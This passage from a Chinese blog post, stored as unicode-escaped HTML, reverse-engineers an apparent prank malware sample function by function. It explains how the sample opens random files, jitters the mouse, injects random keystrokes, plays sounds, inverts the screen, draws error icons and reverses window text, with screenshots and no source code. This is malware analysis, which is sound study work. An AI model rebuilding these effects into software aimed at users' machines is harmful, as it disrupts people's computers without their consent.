\u5148\u662fsub_401A55()<\/code>\u968f\u673a\u6570\u5230v2<\/code>\uff0c\u7136\u540eShellExecute (&lpFile)[v2 % 0x2E]<\/code>\uff0c\u5373\u968f\u673a\u6253\u5f00\u4ee5\u4e0b\u6587\u4ef6<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/38.png\")
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/39.png\")
<\/p>\n
<\/p>\n
\u6765\u5230sub_40156D<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/40.png\")
<\/p>\n
\u5148\u662fGetCursorPos<\/code>\u83b7\u53d6\u6307\u9488\u4f4d\u7f6e\uff0c\u7136\u540e\u75af\u72c2\u5728\u4e00\u5b9a\u8303\u56f4\u5185\u968f\u673a\uff0c\u6700\u540eSetCursorPos<\/code>\uff0c\u5b9e\u73b0\u4e86\u9f20\u6807\u4e0d\u65ad\u6296\u52a8\u8ddf\u559d\u4e86\u8109\u52a8\u4e00\u6837<\/del>\u7684\u6548\u679c\u3002<\/p>\n <\/p>\n
\u6765\u5230sub_4017A5<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/41.png\")
<\/p>\n
\u4e5f\u5f88\u660e\u663e\uff0c\u5148\u662f\u968f\u673a\u4e86\u4e00\u5b9a\u8303\u56f4\u5185\u7684\u6570\u4f5c\u4e3aSendInput<\/code>\u7684\u53c2\u6570\uff081=INPUT_KEYBOARD<\/code>\uff09\uff0c\u4e14\u8fd9\u4e2a\u968f\u673a\u6570\u4f5c\u4e3a\u53ef\u89c6ASCII<\/code>\u88ab\u6a21\u62df\u53d1\u9001\u81f3\u952e\u76d8\u3002\uff08'0'=48 '0'+42=90='Z'<\/code>\uff09<\/p>\n <\/p>\n
\u6765\u5230sub_4016A0<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/42.png\")
<\/p>\n
\u968f\u673a\u4e86\u4e00\u4e2a\u6570\u4f5c\u4e3aPlaySound<\/code>\u7684\u53c2\u6570(&pszSound)[v1 % 3]<\/code>\uff0c\u5373\u968f\u673a\u64ad\u653e\u4e0b\u5217\u58f0\u97f3<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/43.png\")
<\/p>\n
<\/p>\n
\u6765\u5230sub_4015D4<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/44.png\")
<\/p>\n
\u5148\u7528GetDesktopWindow()<\/code>\u83b7\u53d6\u4e86\u9876\u5c42\u684c\u9762\u7684\u53e5\u67c4\uff0c\u518d\u7528GetWindowDC()<\/code>\u83b7\u53d6\u4e86\u684c\u9762\u7684\u7a97\u53e3\u8bbe\u5907\u4e0a\u4e0b\u6587\uff08DC\uff09\uff0c\u63a5\u7740\u7528GetWindowRect<\/code>\u83b7\u53d6\u684c\u9762\u7684\u5927\u5c0f\uff0c\u6700\u540e\u4f7f\u7528BitBlt()<\/code>\u7ed8\u5236\u56fe\u5f62\u5e76ReleaseDC()<\/code>\u5173\u95ed\u5199\u5165\u3002<\/p>\nBitBlt()<\/code>\u53c2\u6570\u4e2d\u76840x330008=NOTSRCCOPY<\/code>\u5373\u201c <\/code>
\nCopies the inverted source rectangle to the destination.\u201d(MSDN)<\/code>\uff0c\u5c31\u662f\u5b9e\u73b0\u4e86\u5c06\u6574\u4e2a\u684c\u9762\u8fdb\u884c\u53cd\u8272\u663e\u793a\u7684\u529f\u80fd\u3002\uff08\u4e00\u4e2aF5\u5237\u65b0\u5373\u53ef\u590d\u539f\uff09<\/p>\n <\/p>\n
\u6765\u5230sub_40162A<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/45.png\")
<\/p>\n
\u53d1\u73b0\u521b\u5efa\u4e86\u4e00\u4e2a\u65b0\u7ebf\u7a0b\u6267\u884csub_401994<\/code>\uff0c\u8ddf\u8fdb<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/46.png\")
<\/p>\n
\u529f\u80fd\u4e0e\u4e4b\u524d\u5206\u6790\u7684\u7c7b\u4f3c\u3002<\/p>\n
<\/p>\n
\u6765\u5230sub_401866<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/47.png\")
<\/p>\n
\u9996\u5148\u4f7f\u7528GetSystemMetrics()<\/code>\u83b7\u53d6ICO<\/code>\u652f\u6301\u5927\u5c0f\uff0c\u5982\u4e0b<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/48.png\")
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/49.png\")
<\/p>\n
\u7136\u540e\u540c\u6837\u7684\u83b7\u53d6\u684c\u9762DC<\/code>\uff0c\u9f20\u6807\u4f4d\u7f6e\u3002\u4e4b\u540e\u7528LoadIcon()<\/code>\u8bfb\u53d6ICO<\/code>\u56fe\u7247\uff0c\u5728\u9f20\u6807\u4f4d\u7f6e\u4e0a\u8c03\u7528DrawIcon<\/code>\u7ed8\u5236ICO<\/code>\u56fe\u7247\u540e\uff0c\u518d\u968f\u673a\u751f\u6210\u4f4d\u7f6e\u7ed8\u5236ICO<\/code>\u56fe\u7247\u3002\uff08\u540c\u6837F5\u5237\u65b0\u53ef\u53bb\u9664\uff09<\/p>\n\u6ce8\uff1a0x7F01=32513=IDI_ERROR 0x7F03=32515=IDI_EXCLAMATION<\/code><\/p>\n <\/p>\n
\u6765\u5230sub_401688<\/code><\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/50.png\")
<\/p>\n
\u4f7f\u7528\u4e86EnumChildWindows()<\/code>\u83b7\u53d6\u684c\u9762\u4e0a\u6240\u6709\u5b50\u7a97\u53e3\uff0c\u5e76\u4e14\u7528EnumFunc()<\/code>\u51fd\u6570\u56de\u8c03\uff0c\u8ddf\u8fdb\u3002<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/51.png\")
<\/p>\n
\u4f7f\u7528GlobalAlloc()<\/code>\u5206\u914d\u5806\u7a7a\u95f4\uff0c\u4f5c\u4e3aSendMessageTimeout()<\/code>\u7684\u4e00\u53c2\u6570\uff0c\u540c\u65f6\u8bbe\u7f6eMsg<\/code>\uff0c\u8d85\u65f6\u65f6\u95f4\u4e3a0x64=100msec
\n<\/code>![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/52.png\")
<\/p>\nMsg=0xD<\/code>\uff0c\u5f00\u59cb\u5148\u83b7\u53d6\u7a97\u53e3\u4e2d\u6240\u6709\u6587\u672c\uff0c\u5b58\u5230v2<\/code>\uff0c\u7136\u540e\u5c06v2<\/code>\u4ee3\u5165sub_401AA0<\/code>\uff0c\u6700\u540eMsg=0xC<\/code>\u91cd\u65b0\u8bbe\u7f6e\u7a97\u53e3\u7684\u6587\u672c\u4e3a\u5904\u7406\u540e\u7684v2<\/code>\u3002\u8ddf\u8fdb\u6b64\u51fd\u6570\u3002<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/53.png\")
<\/p>\n
\u5bf9\u4e0d\u8d77\u6839\u672c\u4e0d\u60f3\u770b![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/06\/QQ\u56fe\u724720180624220829.jpg\")
\uff0c\u81ea\u5df1\u53bb\u8bd5\u8fc7\u4e4b\u540e\u77e5\u9053\u8fd9\u4e2a\u51fd\u6570\u4f5c\u7528\u662f\u98a0\u5012\u5b57\u7b26\u4e32\uff0c\u540cSTL<\/code>\u4e2dreverse()<\/code>\u4e00\u6837\u3002<\/p>\n
![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/1-1.png\")
<\/p>\n![\"\"](\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2018\/08\/2-1.png\")
<\/p>\n